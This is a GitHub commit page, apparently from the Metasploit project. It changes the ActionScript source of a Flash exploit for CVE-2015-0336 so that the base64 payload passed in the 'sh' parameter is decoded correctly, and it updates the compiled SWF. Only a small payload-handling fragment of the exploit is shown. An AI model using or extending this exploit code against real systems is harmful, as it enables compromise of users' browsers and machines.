Skip to content

Commit 19c7445

Browse files
committed
1 parent 23d244b commit 19c7445

File tree

2 files changed

+5
-2
lines changed
  • data/exploits/CVE-2015-0336
  • external/source/exploits/CVE-2015-0336

2 files changed

+5
-2
lines changed

data/exploits/CVE-2015-0336/msf.swf

61 Bytes
Binary file not shown.

external/source/exploits/CVE-2015-0336/Msf.as

Lines changed: 5 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -32,8 +32,11 @@ package
3232
private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
3333

3434
public function Msf() {
35-
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
36-
payload = b64.toByteArray().toString();
35+
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
36+
var pattern:RegExp = / /g;
37+
b64_payload = b64_payload.replace(pattern, "+")
38+
b64.decode(b64_payload)
39+
payload = b64.toByteArray().toString()
3740
trigger_swf = LoaderInfo(this.root.loaderInfo).parameters.tr
3841

3942
ba.endian = "littleEndian"

0 commit comments

Comments
 (0)